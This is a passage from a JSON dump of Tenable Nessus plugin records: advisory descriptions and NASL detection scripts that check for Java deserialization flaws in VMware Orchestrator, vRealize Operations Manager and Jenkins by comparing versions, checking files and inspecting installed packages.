value:\"2016-B-0006\");\n script_xref(name:\"CERT\", value:\"576313\");\n\n script_name(english:\"VMware vCenter / vRealize Orchestrator Appliance 4.2.x / 5.x / 6.x Java Object Deserialization RCE (VMSA-2015-0009)\");\n script_summary(english:\"Checks the version of VMware vCenter/vRealize Orchestrator Appliance.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization appliance installed that is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter / vRealize Orchestrator Appliance\ninstalled on the remote host is 4.2.x or 5.x or 6.x and includes the\nApache Commons Collections (ACC) library version 3.2.1. It is,\ntherefore, affected by a remote code execution vulnerability due to\nunsafe deserialize calls of unauthenticated Java objects to the ACC\nlibrary. An unauthenticated, remote attacker can exploit this, by\nsending a crafted request, to execute arbitrary code on the target\nhost.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2015-0009.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.vmware.com/selfservice/microsites/search.do?cmd=displayKC&externalId=2141244\");\n # https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?91868e8b\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.infoq.com/news/2015/11/commons-exploit\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the patch referenced in VMware KB 2141244.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-6934\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_orchestrator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vrealize_orchestrator\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/VMware vCenter Orchestrator/Version\", \"Host/VMware vCenter Orchestrator/VerUI\", \"Host/VMware vCenter Orchestrator/Build\", \"HostLevelChecks/proto\", \"Host/local_checks_enabled\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"telnet_func.inc\");\ninclude(\"hostlevel_funcs.inc\");\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS ||\n get_one_kb_item('HostLevelChecks/proto') == 'local')\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nversion = get_kb_item_or_exit(\"Host/VMware vCenter Orchestrator/Version\");\nverui = get_kb_item_or_exit(\"Host/VMware vCenter Orchestrator/VerUI\");\n\nproto = get_kb_item_or_exit('HostLevelChecks/proto');\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\n\nif (proto == 'local')\n info_t = INFO_LOCAL;\nelse if (proto == 'ssh')\n{\n info_t = INFO_SSH;\n ret = ssh_open_connection();\n if (!ret) audit(AUDIT_FN_FAIL, 'ssh_open_connection');\n}\nelse\n exit(0, 'This plugin only attempts to run commands locally or via SSH, and neither is available against the remote host.');\n\napp_name = \"VMware vCenter/vRealize Orchestrator Appliance\";\n\nif (version !~ \"^4\\.2($|\\.)\" && version !~ \"^5\\.\" && version !~ \"^6\\.\")\n audit(AUDIT_INST_VER_NOT_VULN, app_name, verui);\n\n# if any of these files exist, we are vulnerable\n# /var/lib/vco/app-server/deploy/vco/WEB-INF/lib/commons-collections-3.2.1.jar\n# /var/lib/vco/configuration/lib/o11n/commons-collections-3.2.1.jar\n# /opt/vmo/app-server/server/vmo/lib/commons-collections.jar\n# /opt/vmo/configuration/jetty/lib/ext/commons-collections.jar\n\nfile1 = \"/var/lib/vco/app-server/deploy/vco/WEB-INF/lib/commons-collections-3.2.1.jar\";\nfile2 = \"/var/lib/vco/configuration/lib/o11n/commons-collections-3.2.1.jar\";\nfile3 = \"/opt/vmo/app-server/server/vmo/lib/commons-collections.jar\";\nfile4 = \"/opt/vmo/configuration/jetty/lib/ext/commons-collections.jar\";\n\nfile1_exists = info_send_cmd(cmd:\"ls \" + file1 + \" 2>/dev/null\");\nfile2_exists = info_send_cmd(cmd:\"ls \" + file2 + \" 2>/dev/null\");\nfile3_exists = info_send_cmd(cmd:\"ls \" + file3 + \" 2>/dev/null\");\nfile4_exists = info_send_cmd(cmd:\"ls \" + file4 + \" 2>/dev/null\");\n\nif(info_t == INFO_SSH) ssh_close_connection();\n\nif (empty_or_null(file1_exists) && empty_or_null(file2_exists) && empty_or_null(file3_exists) && empty_or_null(file4_exists))\n audit(AUDIT_INST_VER_NOT_VULN, app_name, verui);\n\nreport = '\\n Installed version : ' + verui;\nif (!empty_or_null(file1_exists))\n report += '\\n Vulnerable library : ' + file1;\nif (!empty_or_null(file2_exists))\n report += '\\n Vulnerable library : ' + file2;\nif (!empty_or_null(file3_exists))\n report += '\\n Vulnerable library : ' + file3;\nif (!empty_or_null(file4_exists))\n report += '\\n Vulnerable library : ' + file4;\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:29:58", "description": "The version of VMware vRealize Operations (vROps) Manager running on the remote web server is 6.x prior to 6.40. It is, therefore, affected by a flaw in the Suite API CollectorHttpRelayController component due to improper validation of DiskFileItem objects stored in the 'relay-request' XML before attempting deserialization. An authenticated, remote attacker can exploit this issue, via a specially crafted DiskFileItem object embedded in the XML, to move or write arbitrary content to files, resulting in a denial of service condition.", "cvss3": {}, "published": "2016-12-01T00:00:00", "type": "nessus", "title": "VMware vRealize Operations Manager ver 6.x < 6.40 Suite API CollectorHttpRelayController RelayRequest Object DiskFileItem Deserialization DoS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7462"], "modified": "2019-02-26T00:00:00", "cpe": ["cpe:/a:vmware:vrealize_operations"], "id": "VMWARE_VREALIZE_OPERATIONS_MANAGER_V640_DESERIALIZATION.NASL", "href": "https://www.tenable.com/plugins/nessus/95441", "sourceData": "# (C) Tenable Network Security, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95441);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/02/26 4:50:08\");\n\n script_cve_id(\"CVE-2016-7462\");\n script_bugtraq_id(94351);\n script_xref(name:\"TRA\", value:\"TRA-2016-34\");\n script_xref(name:\"VMSA\", value:\"2016-0020\");\n\n script_name(english:\"VMware vRealize Operations Manager ver 6.x < 6.40 Suite API CollectorHttpRelayController RelayRequest Object DiskFileItem Deserialization DoS\");\n script_summary(english:\"Checks the version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A cloud operations management application running on the remote web\nserver is affected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vRealize Operations (vROps) Manager running on\nthe remote web server is 6.x prior to 6.40. It is, therefore, affected\nby a flaw in the Suite API CollectorHttpRelayController component due\nto improper validation of DiskFileItem objects stored in the\n'relay-request' XML before attempting deserialization. An\nauthenticated, remote attacker can exploit this issue, via a specially\ncrafted DiskFileItem object embedded in the XML, to move or write\narbitrary content to files, resulting in a denial of service\ncondition.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2016-0020.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2016-34\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vRealize Operations Manager version 6.40 or higher.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-7462\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vrealize_operations\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_require_keys(\"installed_sw/vRealize Operations Manager\");\n script_dependencies(\"vmware_vrealize_operations_manager_webui_detect.nbin\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"install_func.inc\");\n\napp = 'vRealize Operations Manager';\nget_install_count(app_name:app, exit_if_zero:TRUE);\ninst = get_single_install(app_name:app, combined:TRUE);\nport = inst['port'];\nver = inst['version'];\npath = inst['path'];\n\nfix = '6.4';\nret = ver_compare(fix:fix,\n minver: '6.0',\n ver:ver,\n strict:TRUE);\n\nif (isnull(ret) || ret >= 0)\n{\n audit(AUDIT_INST_VER_NOT_VULN, app, ver);\n}\nreport =\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\nsecurity_report_v4(port:port, severity:SECURITY_HOLE,\n extra:report);\nexit(0);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:24", "description": "The version of VMware vCenter / vRealize Orchestrator installed on the remote host is 4.2.x, 5.x, or 6.x and includes the Apache Commons Collections (ACC) library version 3.2.1. It is, therefore, affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the ACC library. An unauthenticated, remote attacker can exploit this, by sending a crafted request, to execute arbitrary code on the target host.", "cvss3": {}, "published": "2016-01-06T00:00:00", "type": "nessus", "title": "VMware vCenter / vRealize Orchestrator 4.2.x / 5.x / 6.x Java Object Deserialization RCE (VMSA-2015-0009)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6934"], "modified": "2021-10-25T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_orchestrator", "cpe:/a:vmware:vrealize_orchestrator"], "id": "VMWARE_ORCHESTRATOR_VMSA_2015_0009.NASL", "href": "https://www.tenable.com/plugins/nessus/87763", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87763);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/10/25\");\n\n script_cve_id(\"CVE-2015-6934\");\n script_bugtraq_id(79648);\n script_xref(name:\"VMSA\", value:\"2015-0009\");\n script_xref(name:\"IAVB\", value:\"2016-B-0006\");\n script_xref(name:\"CERT\", value:\"576313\");\n\n script_name(english:\"VMware vCenter / vRealize Orchestrator 4.2.x / 5.x / 6.x Java Object Deserialization RCE (VMSA-2015-0009)\");\n script_summary(english:\"Checks the version of VMware vCenter/vRealize Orchestrator.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization application installed that is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter / vRealize Orchestrator installed on the\nremote host is 4.2.x, 5.x, or 6.x and includes the Apache Commons\nCollections (ACC) library version 3.2.1. It is, therefore, affected by\na remote code execution vulnerability due to unsafe deserialize calls\nof unauthenticated Java objects to the ACC library. An\nunauthenticated, remote attacker can exploit this, by sending a\ncrafted request, to execute arbitrary code on the target host.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2015-0009.html\");\n # https://kb.vmware.com/selfservice/microsites/search.do?cmd=displayKC&externalId=2141244\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5c73d796\");\n # https://blogs.apache.org/foundation/entry/apache_commons_statement_to_widespread\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?91868e8b\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.infoq.com/news/2015/11/commons-exploit\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the patch referenced in VMware KB 2141244.\");\n script_set_attribute(attribute:\"agent\", value:\"windows\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-6934\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_orchestrator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vrealize_orchestrator\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vcenter_orchestrator_installed.nbin\");\n script_require_keys(\"installed_sw/VMware vCenter Orchestrator\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\n\napp_name = \"VMware vCenter Orchestrator\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\nverui = install['VerUI'];\npath = install['path'];\n\napp_name = \"VMware vCenter/vRealize Orchestrator\";\n\nif (version !~ \"^4\\.2($|\\.)\" && version !~ \"^5\\.\" && version !~ \"^6\\.\")\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, verui, path);\n\n# if any of these files exist, we are vulnerable\n# orchestrator_install_folder\\app-server\\deploy\\vco\\WEB-INF\\lib\\commons-collections-3.2.1.jar\n# orchestrator_install_folder\\configuration\\lib\\o11n\\commons-collections-3.2.1.jar\n# orchestrator_install_folder\\app-server\\server\\vmo\\lib\\commons-collections.jar\n# orchestrator_install_folder\\configuration\\jetty\\lib\\ext\\commons-collections.jar\n\nfile1 = hotfix_append_path(path:path, value:\"app-server\\deploy\\vco\\WEB-INF\\lib\\commons-collections-3.2.1.jar\");\nfile2 = hotfix_append_path(path:path, value:\"configuration\\lib\\o11n\\commons-collections-3.2.1.jar\");\nfile3 = hotfix_append_path(path:path, value:\"app-server\\server\\vmo\\lib\\commons-collections.jar\");\nfile4 = hotfix_append_path(path:path, value:\"configuration\\jetty\\lib\\ext\\commons-collections.jar\");\n\nfile1_exists = hotfix_file_exists(path:file1);\nfile2_exists = hotfix_file_exists(path:file2);\nfile3_exists = hotfix_file_exists(path:file3);\nfile4_exists = hotfix_file_exists(path:file4);\n\nhotfix_check_fversion_end();\n\nif (!file1_exists && !file2_exists && !file3_exists && !file4_exists)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, verui, path);\n\nreport = '\\n Installed version : ' + verui;\nif (file1_exists)\n report += '\\n Vulnerable library : ' + file1;\nif (file2_exists)\n report += '\\n Vulnerable library : ' + file2;\nif (file3_exists)\n report += '\\n Vulnerable library : ' + file3;\nif (file4_exists)\n report += '\\n Vulnerable library : ' + file4;\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:18:51", "description": "Security fix for CVE-2016-9299\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-03-06T00:00:00", "type": "nessus", "title": "Fedora 24 : jenkins / jenkins-remoting (2016-93679a91df)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:jenkins", "p-cpe:/a:fedoraproject:fedora:jenkins-remoting", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-93679A91DF.NASL", "href": "https://www.tenable.com/plugins/nessus/97533", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-93679a91df.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97533);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-9299\");\n script_xref(name:\"FEDORA\", value:\"2016-93679a91df\");\n\n script_name(english:\"Fedora 24 : jenkins / jenkins-remoting (2016-93679a91df)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-9299\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-93679a91df\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jenkins and / or jenkins-remoting packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Jenkins CLI HTTP Java Deserialization Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"jenkins-1.651.3-2.fc24\")) flag++;\nif (rpm_check(release:\"FC24\", reference:\"jenkins-remoting-2.62.3-1.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jenkins / jenkins-remoting\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:30:27", "description": "Jenkins Security Advisory :\n\nAn unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java object to the Jenkins CLI, making Jenkins connect to an attacker-controlled LDAP server, which in turn can send a serialized payload leading to code execution, bypassing existing protection mechanisms.", "cvss3": {}, "published": "2016-11-16T00:00:00", "type": "nessus", "title": "FreeBSD : jenkins -- Remote code execution vulnerability in remoting module (27eee66d-9474-44a5-b830-21ec12a1c307)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:jenkins", "p-cpe:/a:freebsd:freebsd:jenkins-lts", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_27EEE66D947444A5B83021EC12A1C307.NASL", "href": "https://www.tenable.com/plugins/nessus/94918", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94918);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-9299\");\n\n script_name(english:\"FreeBSD : jenkins -- Remote code execution vulnerability in remoting module (27eee66d-9474-44a5-b830-21ec12a1c307)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jenkins Security Advisory :\n\nAn unauthenticated remote code execution vulnerability allowed\nattackers to transfer a serialized Java object to the Jenkins CLI,\nmaking Jenkins connect to an attacker-controlled LDAP server, which in\nturn can send a serialized payload leading to code execution,\nbypassing existing protection mechanisms.\"\n );\n # https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2016-11-16\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c434d472\"\n );\n # https://vuxml.freebsd.org/freebsd/27eee66d-9474-44a5-b830-21ec12a1c307.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f5bd25ad\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Jenkins CLI HTTP Java Deserialization Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:jenkins-lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", 